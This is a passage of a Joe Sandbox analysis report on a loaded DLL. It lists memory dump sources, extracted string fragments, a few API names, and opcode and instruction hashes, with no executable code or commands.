                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.278874507.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: V$bVZ$o(
                                                                                                        • API String ID: 0-1660054416
                                                                                                        • Opcode ID: c573c94778afb4164dd1f31be71a66e0f46c26de5815c84ea55065cf2efd2382
                                                                                                        • Instruction ID: 7ef0dff0314bf7e4e26ddc1ed0add8f6d506e2d18b76783c6c5e1c9ab995db20
                                                                                                        • Opcode Fuzzy Hash: c573c94778afb4164dd1f31be71a66e0f46c26de5815c84ea55065cf2efd2382
                                                                                                        • Instruction Fuzzy Hash: 62C1297050074E8FDF89DF24C88AADE3BA1FB58398F114219FC4AA62A0D778D595CBC5
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.278874507.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: #X$$&]$m%K
                                                                                                        • API String ID: 0-1065608980
                                                                                                        • Opcode ID: 7c1237e4964242170fe6cd8b4d96af821d7603f8e1f845348ad2ac7cd3c31af6
                                                                                                        • Instruction ID: 281ae2356dc6a3955f278cfb62bb8b0cbfc4af089bf5b994b6edc0547db548b7
                                                                                                        • Opcode Fuzzy Hash: 7c1237e4964242170fe6cd8b4d96af821d7603f8e1f845348ad2ac7cd3c31af6
                                                                                                        • Instruction Fuzzy Hash: 48C179B1A0460DCFDB68DF78D15A5DD7BF1BB48308F206129F8269A2A2E374A509CF54
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.278874507.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: K#$LI$cn
                                                                                                        • API String ID: 0-3773415493
                                                                                                        • Opcode ID: 959f25c4968512607ae0cca543834cbc84a398ae39e464127cc603f4c4925a13
                                                                                                        • Instruction ID: af7bcaa4455c986dbcfdcb56c81b34c69ff90ba63cace1699fbe1714427d0302
                                                                                                        • Opcode Fuzzy Hash: 959f25c4968512607ae0cca543834cbc84a398ae39e464127cc603f4c4925a13
                                                                                                        • Instruction Fuzzy Hash: BEA1497091474CEBEB99CF68D8C9ADDBBB0FB44314F50521AF806A72A1CB749985CF41
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.278874507.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: $e$Is$^F
                                                                                                        • API String ID: 0-4110932142
                                                                                                        • Opcode ID: 8b01df609d42911d7dbed2b5ba814d47211c694639234543d432211bb7cfcbab
                                                                                                        • Instruction ID: acc62b02288f5beda3e750dbd5050400b1e4c18f34ddb480ea367d498b282e57
                                                                                                        • Opcode Fuzzy Hash: 8b01df609d42911d7dbed2b5ba814d47211c694639234543d432211bb7cfcbab
                                                                                                        • Instruction Fuzzy Hash: 0051587061C7488FD7A8DF18D48679BB7E0FB89710F805A1DE8CA83255D770A845CB87
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.278874507.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 0ZI$4$dUn
                                                                                                        • API String ID: 0-3362017604
                                                                                                        • Opcode ID: c73b6bf479576f7c26dbb328f7938954da3fed1ffa6b789c040732a3e6a37130
                                                                                                        • Instruction ID: 064bfcd7f6638f6f98711acfe7d0f42a6c132ae3c1731c2332aecbaa5a5ea63a
                                                                                                        • Opcode Fuzzy Hash: c73b6bf479576f7c26dbb328f7938954da3fed1ffa6b789c040732a3e6a37130
                                                                                                        • Instruction Fuzzy Hash: 0B712B7050C7888FD7B9DF28C5856DEBBF5FB85744F10491DE68A8B2A0CB769A44CB02
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.278874507.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: O$[_K&$j
                                                                                                        • API String ID: 0-2002151384
                                                                                                        • Opcode ID: 5cf88421c4129e4e4d54df4380985a4d6ea1c7f681516431ef3b689608c2f6b2
                                                                                                        • Instruction ID: 130c59dac31ff76bf7ecf9fa28c9de255088e9ae4d54174b3cf98d95bf2c37bf
                                                                                                        • Opcode Fuzzy Hash: 5cf88421c4129e4e4d54df4380985a4d6ea1c7f681516431ef3b689608c2f6b2
                                                                                                        • Instruction Fuzzy Hash: 2B71197050074E8BDF98CF64C8866DE7FB0FB18398F114219E84AA6290D778D695CBD9
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.278874507.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: -h$WT$>"I
                                                                                                        • API String ID: 0-2979910649
                                                                                                        • Opcode ID: 5da2aa70a551583c734fba3b02d0d500b77670d66d11a43c5cdac74a8a900ebb
                                                                                                        • Instruction ID: 6ab3343b6eba3a4e136222caae9e220da80dded31bc064814014cf5ee83a2919
                                                                                                        • Opcode Fuzzy Hash: 5da2aa70a551583c734fba3b02d0d500b77670d66d11a43c5cdac74a8a900ebb
                                                                                                        • Instruction Fuzzy Hash: 3B513770D04719DBEB98DFA8E8C66DDBBB1FB48314F10422DE406A72A0DB74994ACF41
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.278874507.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 34$I$s$-
                                                                                                        • API String ID: 0-2987712878
                                                                                                        • Opcode ID: d159740019d0e44eb242a52937dbef6f57aff17195a7a3dbeb5ec86a09e691a0
                                                                                                        • Instruction ID: c68e5fb14b586ef0c40ae38bb2e1e53b7502f2b933fd0fcbf89fc63657b2c948
                                                                                                        • Opcode Fuzzy Hash: d159740019d0e44eb242a52937dbef6f57aff17195a7a3dbeb5ec86a09e691a0
                                                                                                        • Instruction Fuzzy Hash: 11817FB590438E8FDF48CF64D88A5CE7BB0FB58358F004A19F86696250D3B8DA25CF85
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.278874507.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 3W$sR$v
                                                                                                        • API String ID: 0-1518777123
                                                                                                        • Opcode ID: f3dd92e2af734b6d8115ba1069bd08988295307ba7074c78637fd19ad14d7fff
                                                                                                        • Instruction ID: c80d461967320ed9e8a283cc826d951d9acd29724fcff4159453b991850cd8cf
                                                                                                        • Opcode Fuzzy Hash: f3dd92e2af734b6d8115ba1069bd08988295307ba7074c78637fd19ad14d7fff
                                                                                                        • Instruction Fuzzy Hash: 7341B7B190034A8FDB48CF64C48A5DE7FB1FB58398F504619FC55A6290D3B896A4CBC5
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.278874507.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: >$Da$p
                                                                                                        • API String ID: 0-3088490888
                                                                                                        • Opcode ID: f12031464043262cdf2dafd4592515557577c67e86acbf92f010fd442108c94b
                                                                                                        • Instruction ID: 353200845392aed209a7bf182385cf358c291394da9f2443bd3897ec4edc7df4
                                                                                                        • Opcode Fuzzy Hash: f12031464043262cdf2dafd4592515557577c67e86acbf92f010fd442108c94b
                                                                                                        • Instruction Fuzzy Hash: 6D41E6B091038E8BDF48CF64C85A4DE7BB0FB48358F50461DEC66A6290D3B8DA64CB85
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.278874507.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: Y$[?$z
                                                                                                        • API String ID: 0-81702474
                                                                                                        • Opcode ID: de9be9ef5f92379645fd7b383ffa1058af5c5180b6576b9449143d6c210c2e7c
                                                                                                        • Instruction ID: 17df8d7d90ce60fd82a33c040225e484019840e26e547c8a3bada95d9f576c07
                                                                                                        • Opcode Fuzzy Hash: de9be9ef5f92379645fd7b383ffa1058af5c5180b6576b9449143d6c210c2e7c
                                                                                                        • Instruction Fuzzy Hash: CF41E2705187859BD398DF68C48991FBBF0FBC5388F906A1DF982866A0C7B4D958CB43
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.278874507.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: %i$J_d$o
                                                                                                        • API String ID: 0-2302849290
                                                                                                        • Opcode ID: 26ed555b5558ee36b46f6658a60b078ea9f2e99077f6798d56f26bd8e6eafb97
                                                                                                        • Instruction ID: 229211298eb705b26fc20b4edb46dcac7afe9bcf222d918521f2a27618a9e0ef
                                                                                                        • Opcode Fuzzy Hash: 26ed555b5558ee36b46f6658a60b078ea9f2e99077f6798d56f26bd8e6eafb97
                                                                                                        • Instruction Fuzzy Hash: 7A41B4B080074E8FDB48CF24D4864DE7FB1FB68398F640619F856A62A0D3B4D6A5CBC5
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.278874507.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: %.&$~!$z
                                                                                                        • API String ID: 0-3431779881
                                                                                                        • Opcode ID: 75f8db90995428d235334ca748c23d9b71a29a6c06c75c993f3f4e05e3c73a3c
                                                                                                        • Instruction ID: 9d03681536e8c1acf3d5946c054e5fc16c7955f97845821e7fbbe181f26a3c0c
                                                                                                        • Opcode Fuzzy Hash: 75f8db90995428d235334ca748c23d9b71a29a6c06c75c993f3f4e05e3c73a3c
                                                                                                        • Instruction Fuzzy Hash: E04104B050438A8BDB48CF24C88A5DE3BB0FB58358F01471DFC9AA6290C7B8D664CB84
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.278874507.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: .$B3$J:
                                                                                                        • API String ID: 0-3064689667
                                                                                                        • Opcode ID: fd8509d6533ef7e32cb756af4334f2030a9ae0f8979fbcbea7cb16ab3bf8e675
                                                                                                        • Instruction ID: 182ec4a01b3342a6bdc382118e07b0b009bb3174144ecf8c9284c759066334ab
                                                                                                        • Opcode Fuzzy Hash: fd8509d6533ef7e32cb756af4334f2030a9ae0f8979fbcbea7cb16ab3bf8e675
                                                                                                        • Instruction Fuzzy Hash: 1E41F3B090078E8FDB48CF24C88A0DE7BB0FB58358F114A1DEC56A6290D3B89664CF85
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.278874507.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: Ks$ie$p7
                                                                                                        • API String ID: 0-1618259084
                                                                                                        • Opcode ID: 80a2af57191d82605d2cef362d461bc808ae7e9cf162dbf889fca5d963639e5b
                                                                                                        • Instruction ID: 863d019dd3a3bb72510893778e5e059fd04ef929c99d5fcecc9495c153576d57
                                                                                                        • Opcode Fuzzy Hash: 80a2af57191d82605d2cef362d461bc808ae7e9cf162dbf889fca5d963639e5b
                                                                                                        • Instruction Fuzzy Hash: 2F41B2B180438E8FDF45CF64D88A5CE7BB0FB18358F104A09E869A6290D3B89664CFD5
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.278874507.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: N=?S$v$}j
                                                                                                        • API String ID: 0-4092938293
                                                                                                        • Opcode ID: 9d3866c83932be72d87d742c92594d1c0fe478a87f622f102371e8f125a421ef
                                                                                                        • Instruction ID: 8436987ba3b6f8a2bbd854dc6c076361a1b3de70f86c3d0693d23ca26d216a44
                                                                                                        • Opcode Fuzzy Hash: 9d3866c83932be72d87d742c92594d1c0fe478a87f622f102371e8f125a421ef
                                                                                                        • Instruction Fuzzy Hash: F3211A7021DB48ABD39CDF28D19562ABAF1FBC8744F909A1DF586C73A0C774C9458B42
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.278874507.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 2`$XS$WFY
                                                                                                        • API String ID: 0-4220438673
                                                                                                        • Opcode ID: 4214e4b7748eee943712e52e0a0b26d526995497c398dca3acb8c82fd8363403
                                                                                                        • Instruction ID: 1a3a2533c7ad1ec2e7205bdb6f80c12431c695e37eabcbb0c696e965016089c0
                                                                                                        • Opcode Fuzzy Hash: 4214e4b7748eee943712e52e0a0b26d526995497c398dca3acb8c82fd8363403
                                                                                                        • Instruction Fuzzy Hash: 68215AB46087848FD388DF28D04941BBBE1BB88358F414B2DF4CAA7260D7789A54CF4A
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.279325245.00007FFC123D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFC123D0000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.279243447.00007FFC123D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.279375197.00007FFC12408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.279532482.00007FFC1244E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.279539840.00007FFC12452000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.279547008.00007FFC12455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.279581563.00007FFC12457000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7ffc123d0000_loaddll64.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ExceptionRaise_clrfp
                                                                                                        • String ID:
                                                                                                        • API String ID: 15204871-0
                                                                                                        • Opcode ID: 327b7a6c132c00c2e162c9657ffb3d47e3a234bedabc651e6bde2b282c1ec227
                                                                                                        • Instruction ID: 5c0f2bab4a399a4ac08239fcaf09c8b66c83d6c03caef2df99ea2bf052b1e466
                                                                                                        • Opcode Fuzzy Hash: 327b7a6c132c00c2e162c9657ffb3d47e3a234bedabc651e6bde2b282c1ec227
                                                                                                        • Instruction Fuzzy Hash: DDB18B77600B998BEB15CF2DC8823AC37A4F784B58F448922DB9D877A4CB79D865C710
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.279325245.00007FFC123D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFC123D0000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.279243447.00007FFC123D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.279375197.00007FFC12408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.279532482.00007FFC1244E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.279539840.00007FFC12452000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.279547008.00007FFC12455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.279581563.00007FFC12457000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7ffc123d0000_loaddll64.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: BinaryCryptString
                                                                                                        • String ID:
                                                                                                        • API String ID: 80407269-0
                                                                                                        • Opcode ID: 242a5c4160673c2439d74d93392631954be848024110d8d99870b79e56e5634b
                                                                                                        • Instruction ID: 57a35f70982af07a2434bc9e20a2776e7ead0558624193ade809f23dbcebcd69
                                                                                                        • Opcode Fuzzy Hash: 242a5c4160673c2439d74d93392631954be848024110d8d99870b79e56e5634b
                                                                                                        • Instruction Fuzzy Hash: CA212C3A608F4986DB50CF55E48076AB3A4FBC47A4F405165EA8D83B64CFBDD458CF10
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.278874507.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: Y6}$d9(4
                                                                                                        • API String ID: 0-3330832364
                                                                                                        • Opcode ID: b043fa54239bd32b140c4ade51c25e42e7665cf50e01dff0b3be8c5be184675f
                                                                                                        • Instruction ID: aff03ef72771b13b87f2cc74d6bb077380ea2266c6580fb6b6b65536942d94d8
                                                                                                        • Opcode Fuzzy Hash: b043fa54239bd32b140c4ade51c25e42e7665cf50e01dff0b3be8c5be184675f
                                                                                                        • Instruction Fuzzy Hash: CB12087090470DEFDB98CF68C49AA9EBBF1FB48344F40816DE849AB290D7749A59CB41
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.278874507.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: ?T~$LPX
                                                                                                        • API String ID: 0-3819494200
                                                                                                        • Opcode ID: 5371fcae6a6dea951bf7840fb42d0654fda63255fe2b3c817271c2b7c944b8ce
                                                                                                        • Instruction ID: 5bcc9d51a0cb75c4178e46190e4acf5e718f13166394170a7e92e99ce26cb4c6
                                                                                                        • Opcode Fuzzy Hash: 5371fcae6a6dea951bf7840fb42d0654fda63255fe2b3c817271c2b7c944b8ce
                                                                                                        • Instruction Fuzzy Hash: FCE109B1A0870C9FDF99DFA8D48A6DDBBF1FB58384F00411AE406B7290DB749909CB95
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.278874507.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 5]w$K>DO
                                                                                                        • API String ID: 0-1721466923
                                                                                                        • Opcode ID: 93887384d1e3e316060a719fa74046c8221635d2d4d23715a552f7898b76f6a5
                                                                                                        • Instruction ID: 7ff9c6c976455071c2a9df6d60b89cf37126c55da19abf4d4cee6ceb2b958208
                                                                                                        • Opcode Fuzzy Hash: 93887384d1e3e316060a719fa74046c8221635d2d4d23715a552f7898b76f6a5
                                                                                                        • Instruction Fuzzy Hash: 0BB1227550234CCBEBA9DF68D1CA6DD7BE1EF24344F104019FC5A9A2A2C774D929CB48
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.278874507.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: lqCn$m[l
                                                                                                        • API String ID: 0-3128696216
                                                                                                        • Opcode ID: 4c7d10dd5693097ca8244591837128d2cd95e17d02ebbf0952c9b834f9068715
                                                                                                        • Instruction ID: 4deb5b9ca544bed4c7e5f99d3a15c07392b613d523b2cda5bb59967198a77625
                                                                                                        • Opcode Fuzzy Hash: 4c7d10dd5693097ca8244591837128d2cd95e17d02ebbf0952c9b834f9068715
                                                                                                        • Instruction Fuzzy Hash: CCB11571400709CFDB98CF28C58AADD3BA0FF58358F82422AFD09972A0D774DA59CB49
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.278874507.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: Nt$U
                                                                                                        • API String ID: 0-2773090818
                                                                                                        • Opcode ID: 75f2b5d32e15d85487eb668497678b5eb0055a4daa499d447cf193525b22889b
                                                                                                        • Instruction ID: 45fe5b86ad995d4d9c8212a5c7c68854cc0b5cbfbb722d6ff257206196d8d1d1
                                                                                                        • Opcode Fuzzy Hash: 75f2b5d32e15d85487eb668497678b5eb0055a4daa499d447cf193525b22889b
                                                                                                        • Instruction Fuzzy Hash: FAA1E4B05047888FEB58DF68D8866D93FA1FB48398F11421DFC8AA72A0D778D945CBC5
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.278874507.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: #X$Us
                                                                                                        • API String ID: 0-3203413852
                                                                                                        • Opcode ID: 927f4b49d76b73256ea5c740f2e30509fd742bc0798702765f896e21c4c8ed3c
                                                                                                        • Instruction ID: 41232c5cd5cce4775d7c49e7c64c552743a4e7719aa725caeeb3acb0d5dfb118
                                                                                                        • Opcode Fuzzy Hash: 927f4b49d76b73256ea5c740f2e30509fd742bc0798702765f896e21c4c8ed3c
                                                                                                        • Instruction Fuzzy Hash: 54B167B590070DCFEB98DF28C18A59D3BA9FF55308F404129FC1E962A1E3B8E518CB56
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.278874507.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: %R$tt"
                                                                                                        • API String ID: 0-772664118
                                                                                                        • Opcode ID: cdb4b53f2f09b2303a41a9c0704183505d0985f12a48c0c3b60d1fd3dd25ac21
                                                                                                        • Instruction ID: 8fbc46d1b7e2f611e930d46153dfa18b699fa5ceb3b757a8db7b1acf46b52deb
                                                                                                        • Opcode Fuzzy Hash: cdb4b53f2f09b2303a41a9c0704183505d0985f12a48c0c3b60d1fd3dd25ac21
                                                                                                        • Instruction Fuzzy Hash: 09813C7051474D8BDF98CF28C8896ED3BA0FB48398F565319FD4AA6390CB78D585CB84
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.278874507.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 5t%$y
                                                                                                        • API String ID: 0-493594994
                                                                                                        • Opcode ID: 6f0e00c9ead975cfaf4ea2e77c512cc28932c103f1f544ab72cc7830bdf191ce
                                                                                                        • Instruction ID: 6792571393c1fc0b2eb6fbc5ae81dec58a59b384453640eb5fb68cdcf9e85be0
                                                                                                        • Opcode Fuzzy Hash: 6f0e00c9ead975cfaf4ea2e77c512cc28932c103f1f544ab72cc7830bdf191ce
